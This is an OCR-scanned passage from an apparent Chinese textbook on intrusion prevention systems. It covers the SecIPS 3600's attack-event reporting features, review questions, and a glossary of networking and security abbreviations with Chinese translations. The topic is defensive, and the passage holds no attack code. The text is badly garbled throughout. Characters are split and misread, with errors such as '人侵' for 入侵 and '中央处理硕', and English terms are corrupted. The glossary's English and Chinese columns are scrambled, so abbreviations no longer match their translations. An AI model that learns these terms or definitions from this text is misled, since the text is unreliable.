SecIPS 3600 可 提供 客户 最 完整 的 攻击 事件 记录 信息 ,这 些 信息 包括 黑客 攻击 的 目标 
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主机 、 攻 击 的 时 间 、 攻 击 的 手法 种 类 ,攻击 的 次 数 .黑客 攻击 的 来 源 IP 地 址 ,客户 可 从 内 建 
的 报表 系统 功能 中 轻易 地 搜寻 到 所 需要 的 详细 信息 ,而 不 需 额 外 添 购 一 些 软件 。 

5) 强大 的 管理 和 报表 功能 

网 络 人 侵 防 御 系 统 的 主要 功能 之 一 是 对 黑客 的 入侵 攻击 事件 提供 实时 的 检测 与 预警 
及 完整 的 分 析 报 告 。 因 此 ,一 个 好 的 网 络 人 侵 防 御 系 统 除 了 要 依照 黑客 人 侵 攻 击 的 严重 
程度 ,提出 实时 性 的 入 侵 攻击 严重 程度 的 警报 外 ,更 要 将 这 些 攻 击 事件 加 以 汇总 分 析 ,并 
制作 成 各 种 分 析 报 表 , 以 便 客户 能 依照 分 析 报 表 提 供 的 信息 加 以 分 析 , 进 而 强化 内 部 网 络 
的 安全 措施 ,防范 黑客 进一步 人 侵 攻 击 。 此 外 ,这 些 报表 也 要 能 加 以 整合 打印 ,作为 决策 
主管 考虑 整体 安全 策略 时 的 参考 。 

SecIPS 3600 主动 式 网 络 人 侵 防 御 系 统 中 包含 一 套 完 整 的 报表 系统 ,提供 了 多 用 户 可 
同时 使 用 的 报表 界面 ,可 以 查询 .打印 所 有 检测 到 的 网 络 攻击 事件 及 系统 事件 ,其 中 不 仅 
可 以 检视 攻击 事件 的 攻击 名 称 、 攻 击 严 重 程度 .攻击 时 间 .攻击 来 源 及 被 攻击 对 象 等 信息 ， 
也 提供 攻击 事件 的 各 式 统计 图 与 条 形 图 分 析 。 


4.3 ”思考 十 
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述 企业 网 络 人 侵 检测 解决 方案 。 
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简 述 企业 网 络 人 侵 检 测 解决 方案 的 优势 。 
用 户 网 络 信 侵 防 御 解 决 方案 的 优势 及 涡 点 。 
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DoS 
DDoS 
DNS 
DHCP 
DLL 
E 

EG 


英文 缩 上 略语 


Application Programming Interface 
Advanced Persistent Threat 

Automated Intrusion Response 

Automated Response System 

Address Resolution Protocol 

Autonomous Agents for Intrusion Detection 


Application IPS 
Border Gateway Protocol 
Central Processing Unit 


Decision Information Distribution 
System 

Denial of Service 

Distributed Denial of Service 

Domain Name Service 

Dynamic Host Configuration Protocol 


Dynamic Link Library 


Event (renerators 
Event Analyzers 
Event Databases 


Enterprise Resource Planning 


File Transfer Protocol 


应 用 程序 接口 

高 级 持续 性 威胁 
自动 和 人 侵 响 应 技术 
自动 响应 系统 

地 址 解析 协议 

用 于 入 侵 检测 的 自治 代理 
应 用 入 侵 防 御 系 统 


边界 网 关 协 议 


中 央 处 理 硕 


决策 信息 发 布 系统 


拒绝 服务 

分 布 式 拒 绝 服 务 
域名 服务 
动态 主机 配置 协议 
动态 链接 库 


事件 产生 器 
事件 分 析 器 
事件 数据 库 
企业 资源 计划 


文件 传输 协议 


入 侵 检 测 与 入 侵 防 得 


(mL 


HIIP 


HIPS 


HIIPS 


IP 
ICMP 
IGMP 
I be 
IM 


NIPS 


NGIPS 


126 


Generic Routing Encapsulation 


Hyper Text Transfer Protocol 


Host-Based IPS 


HyperText Transfer Protocol over Secure Socket 
Layer 或 HyperText Transfer Protocol Secure 


Intrusion Detection Systems 

Intrusion Detection Expert System 
Intrusion Prevention System 

Intrusion Response System 

Internet Relay Chat 

Intrusion Detection Model 

Internet Protocol 

Internet Control Message Protoco] 

Internet Group Manage Protocol 
Intermediate System-to-lIntermediate System 


Instant Messenger 


Management Information Base 
Manual Response System 
Maximum Segment Lifetime 


Maximum Transmission Unit 


Notification Response System 
Network Time Protocol 
Network File System 


Network-Based IPS 


Next (reneration lntrusion Prevention System 


通用 路 由 封装 


超 文 本 传输 协议 
基于 主机 的 入 侵 防御 系统 
超 文 本 传输 安全 协议 


入 侵 检 测 系 统 

入 侵 检 测 专 家 系统 
入 侵 防 御 系 统 

入 侵 啊 应 单元 
互联 网 中 继 聊 天 

入 侵 检 测 模型 

网 络 之 间 互 连 的 协议 
网 络 控 制 报 文 协 议 
互联 网 组 管理 协议 
中 间 系 统 到 中 间 系 统 
即时 通信 


管理 信息 库 

于 工 啊 应 系统 

报 文 最 大 生存 时 间 
最 大 传输 单元 


报警 啊 应 系统 

网 络 时 间 协 议 

网 络 文件 系统 

基于 网 络 的 人 侵 防御 系统 
下 一 代入 侵 防御 系统 


(上 


Telnet 


Office Automation 
Open Shortest Path First 


Upen System lnterconnectlon 


Peer-to-Peer 


Quality of Service 


Response Units 
Reverse Address Resolution Protoco] 


Routing Information Protocol 


Simple Network Management Protoco] 
Simple Mail Transfer Protocol 
Service Awareness 


Structured Query Language 


Transmission Control Protocol 


Teletype over the Network 


User Datagram Protocol 
Unix-to-Unix Copy 


Universal Resource Locator 


英文 缩 略语 


办 公 自动 化 
开放 式 最 短路 径 优先 
开放 系统 互 连 

对 等 网 络 

服务 质量 

响应 单元 

反 向 地 址 转换 协议 
路 由 信息 协议 
简单 网 络 管理 协议 


简单 邮件 传输 协议 
服务 意识 
结构 化 查询 语言 


传输 控制 协议 
远程 登录 协议 


用 户 数据 报 协议 
UNIX 至 UNIX 的 复制 
统一 资源 定位 符 
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